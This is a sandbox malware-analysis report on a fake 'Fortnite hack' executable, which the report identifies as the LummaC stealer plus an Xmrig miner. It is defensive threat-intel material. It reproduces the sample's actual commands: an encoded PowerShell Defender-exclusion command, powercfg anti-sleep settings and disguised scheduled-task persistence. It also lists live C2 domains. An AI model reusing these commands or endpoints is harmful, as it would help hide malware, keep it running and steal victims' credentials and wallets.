Edit tour

Windows Analysis Report
FortniteHack.exe1.exe

Overview

General Information

Sample name:	FortniteHack.exe1.exe
Analysis ID:	1637277
MD5:	28ba19e1dcaeb26263becc4ee53ffe66
SHA1:	da456332601815ce52dcbb2908d1b23b3547aab6
SHA256:	e882d7327d79d9aff5d4c30c0c3b102faeabdb825fa004593518984b16d1ae4d
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer, Xmrig

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Yara detected LummaC Stealer

Yara detected Xmrig cryptocurrency miner

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to inject code into remote processes

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Modifies power options to not sleep / hibernate

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Suspicious Execution of Powershell with Base64

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

FortniteHack.exe1.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\FortniteHack.exe1.exe" MD5: 28BA19E1DCAEB26263BECC4EE53FFE66)

conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FortniteHack.exe1.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\FortniteHack.exe1.exe" MD5: 28BA19E1DCAEB26263BECC4EE53FFE66)

6Y9CVTAOHZQ67PGGTWC454FW0.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)

cmd.exe (PID: 7636 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7688 cmdline: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WmiPrvSE.exe (PID: 7800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powercfg.exe (PID: 7876 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7892 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7908 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7924 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

powercfg.exe (PID: 7944 cmdline: powercfg /hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)

cmd.exe (PID: 7972 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8064 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 8000 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8088 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 392 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://harfanglab.io/insidethelab/unpacking-packxor/ https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2433287684.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: FortniteHack.exe1.exe PID: 6908	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: FortniteHack.exe1.exe PID: 6908	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FortniteHack.exe1.exe PID: 6908	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 6Y9CVTAOHZQ67PGGTWC454FW0.exe PID: 7572	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.FortniteHack.exe1.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.FortniteHack.exe1.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
15.2.6Y9CVTAOHZQ67PGGTWC454FW0.exe.3438bbd.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe, ProcessId: 7572, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe", ParentImage: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe, ParentProcessId: 7572, ParentProcessName: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 7636, ProcessName: cmd.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" , ProcessId: 7688, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" , ProcessId: 7688, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe", ParentImage: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe, ParentProcessId: 7572, ParentProcessName: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7972, ProcessName: cmd.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:35:14.662194+0100	2028371	3	Unknown Traffic	192.168.2.12	49684	188.114.96.3	443	TCP
2025-03-13T13:35:17.777699+0100	2028371	3	Unknown Traffic	192.168.2.12	49688	188.114.96.3	443	TCP
2025-03-13T13:35:20.825726+0100	2028371	3	Unknown Traffic	192.168.2.12	49692	188.114.96.3	443	TCP
2025-03-13T13:35:23.161912+0100	2028371	3	Unknown Traffic	192.168.2.12	49697	188.114.96.3	443	TCP
2025-03-13T13:35:26.553501+0100	2028371	3	Unknown Traffic	192.168.2.12	49698	188.114.96.3	443	TCP
2025-03-13T13:35:29.850571+0100	2028371	3	Unknown Traffic	192.168.2.12	49699	188.114.96.3	443	TCP
2025-03-13T13:35:34.357672+0100	2028371	3	Unknown Traffic	192.168.2.12	49702	188.114.96.3	443	TCP

ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:35:41.760175+0100	2829056	2	Crypto Currency Mining Activity Detected	192.168.2.12	49705	185.215.113.51	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FortniteHack.exe1.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: FortniteHack.exe1.exe	Virustotal: Detection: 56%			Perma Link
Source: FortniteHack.exe1.exe	ReversingLabs: Detection: 57%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_0041D132 CryptUnprotectData,		2_2_0041D132
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_0041DD7B CryptUnprotectData,CryptUnprotectData,		2_2_0041DD7B

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 15.2.6Y9CVTAOHZQ67PGGTWC454FW0.exe.3438bbd.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FortniteHack.exe1.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6Y9CVTAOHZQ67PGGTWC454FW0.exe PID: 7572, type: MEMORYSTR

Source: FortniteHack.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.12:49704 version: TLS 1.2

Source: FortniteHack.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.15.dr

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00F0FCDE FindFirstFileExW,	0_2_00F0FCDE
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00F0FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F0FD8F
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F0FCDE FindFirstFileExW,	2_2_00F0FCDE
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F0FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00F0FD8F

